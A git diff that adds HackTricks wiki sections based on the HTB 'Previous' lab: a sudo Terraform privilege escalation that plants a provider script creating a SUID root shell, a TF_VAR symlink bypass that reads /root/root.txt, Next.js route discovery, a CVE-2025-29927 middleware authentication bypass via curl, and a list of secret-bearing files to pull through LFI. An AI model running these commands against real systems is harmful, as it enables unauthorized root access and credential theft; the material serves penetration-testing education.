Merge pull request #1746 from HackTricks-wiki/update_HTB__Previous_20260110_183001

carlospolop · web-flow · commit 13f481232b5d · 2026-01-17T18:07:31.000+01:00
HTB Previous
diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
@@ -985,6 +985,48 @@ BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo   # or any permitted script/
   - Avoid shell wrappers for sudo-allowed commands; use minimal binaries.
   - Consider sudo I/O logging and alerting when preserved env vars are used.
 
+### Terraform via sudo with preserved HOME (!env_reset)
+
+If sudo leaves the environment intact (`!env_reset`) while allowing `terraform apply`, `$HOME` stays as the calling user. Terraform therefore loads **$HOME/.terraformrc** as root and honors `provider_installation.dev_overrides`.
+
+- Point the required provider at a writable directory and drop a malicious plugin named after the provider (e.g., `terraform-provider-examples`):
+
+```hcl
+# ~/.terraformrc
+provider_installation {
+  dev_overrides {
+    "previous.htb/terraform/examples" = "/dev/shm"
+  }
+  direct {}
+}
+```
+
+```bash
+cat >/dev/shm/terraform-provider-examples <<'EOF'
+#!/bin/bash
+cp /bin/bash /var/tmp/rootsh
+chown root:root /var/tmp/rootsh
+chmod 6777 /var/tmp/rootsh
+EOF
+chmod +x /dev/shm/terraform-provider-examples
+sudo /usr/bin/terraform -chdir=/opt/examples apply
+```
+
+Terraform will fail the Go plugin handshake but executes the payload as root before dying, leaving a SUID shell behind.
+
+### TF_VAR overrides + symlink validation bypass
+
+Terraform variables can be provided via `TF_VAR_<name>` environment variables, which survive when sudo preserves the environment. Weak validations such as `strcontains(var.source_path, "/root/examples/") && !strcontains(var.source_path, "..")` can be bypassed with symlinks:
+
+```bash
+mkdir -p /dev/shm/root/examples
+ln -s /root/root.txt /dev/shm/root/examples/flag
+TF_VAR_source_path=/dev/shm/root/examples/flag sudo /usr/bin/terraform -chdir=/opt/examples apply
+cat /home/$USER/docker/previous/public/examples/flag
+```
+
+Terraform resolves the symlink and copies the real `/root/root.txt` into an attacker-readable destination. The same approach can be used to **write** into privileged paths by pre-creating destination symlinks (e.g., pointing the provider’s destination path inside `/etc/cron.d/`).
+
 ### Sudo env_keep+=PATH / insecure secure_path → PATH hijack
 
 If `sudo -l` shows `env_keep+=PATH` or a `secure_path` containing attacker-writable entries (e.g., `/home/<user>/bin`), any relative command inside the sudo-allowed target can be shadowed.
@@ -1837,6 +1879,7 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 - [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
 - [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
 - [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
+- [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html)
 - [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md
@@ -415,6 +415,20 @@ export default function DownloadPage() {
 
 </details>
 
+### Recon: static export route discovery via _buildManifest
+
+When `nextExport`/`autoExport` are true (static export), Next.js exposes the `buildId` in the HTML and serves a build manifest at `/_next/static/<buildId>/_buildManifest.js`. The `sortedPages` array and route→chunk mapping there enumerate every prerendered page without brute force.
+
+- Grab the buildId from the root response (often printed at the bottom) or from `<script>` tags loading `/_next/static/<buildId>/...`.
+- Fetch the manifest and extract routes:
+
+```bash
+build=$(curl -s http://target/ | grep -oE '"buildId":"[^"]+"' | cut -d: -f2 | tr -d '"')
+curl -s "http://target/_next/static/${build}/_buildManifest.js" | grep -oE '"(/[a-zA-Z0-9_\[\]\-/]+)"' | tr -d '"'
+```
+
+- Use the discovered paths (for example `/docs`, `/docs/content/examples`, `/signin`) to drive auth testing and endpoint discovery.
+
 ## Server-Side in Next.js
 
 ### Server-Side Rendering (SSR)
@@ -881,6 +895,20 @@ export const config = {
 }
 ```
 
+### Middleware authorization bypass (CVE-2025-29927)
+
+If authorization is enforced in middleware, affected Next.js releases (<12.3.5 / 13.5.9 / 14.2.25 / 15.2.3) can be bypassed by injecting the `x-middleware-subrequest` header. The framework will skip middleware recursion and return the protected page.
+
+- Baseline behavior is typically a 307 redirect to a login route like `/api/auth/signin`.
+- Send a long `x-middleware-subrequest` value (repeat `middleware` to hit `MAX_RECURSION_DEPTH`) to flip the response to 200:
+
+```bash
+curl -i "http://target/docs" \
+  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
+```
+
+- Because authenticated pages pull many subresources, add the header to every request (e.g., Burp Match/Replace with an empty match string) to keep assets from redirecting.
+
 ### `next.config.js`
 
 **Location:** Root of the project.
@@ -1203,6 +1231,15 @@ module.exports = {
 
 **Note:** To restrict variables to server-side only, omit them from the `env` object or prefix them with `NEXT_PUBLIC_` for client exposure.
 
+### Useful server artifacts to target via LFI/download endpoints
+
+If you find a path traversal or download API in a Next.js app, target compiled artifacts that leak server-side secrets and auth logic:
+
+- `.env` / `.env.local` for session secrets and provider credentials.
+- `.next/routes-manifest.json` and `.next/build-manifest.json` for a complete route list.
+- `.next/server/pages/api/auth/[...nextauth].js` to recover the compiled NextAuth configuration (often contains fallback passwords when `process.env` values are unset).
+- `next.config.js` / `next.config.mjs` to review rewrites, redirects and middleware routing.
+
 ### Authentication and Authorization
 
 **Approach:**
@@ -1401,6 +1438,7 @@ python3 scanner.py -l hosts.txt -t 20 --waf-bypass -o vulnerable.json
 - [NextjsServerActionAnalyzer (Burp extension)](https://github.com/Adversis/NextjsServerActionAnalyzer)
 - [CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool](https://github.com/Spritualkb/CVE-2025-55182-exp)
 - [CVE-2025-55182 & CVE-2025-66478 React2Shell – All You Need to Know](https://jfrog.com/blog/2025-55182-and-2025-66478-react2shell-all-you-need-to-know/)
+- [0xdf – HTB Previous (Next.js middleware bypass, static export recon, NextAuth config leak)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html)
 - [assetnote/react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
 
 {{#include ../../banners/hacktricks-training.md}}
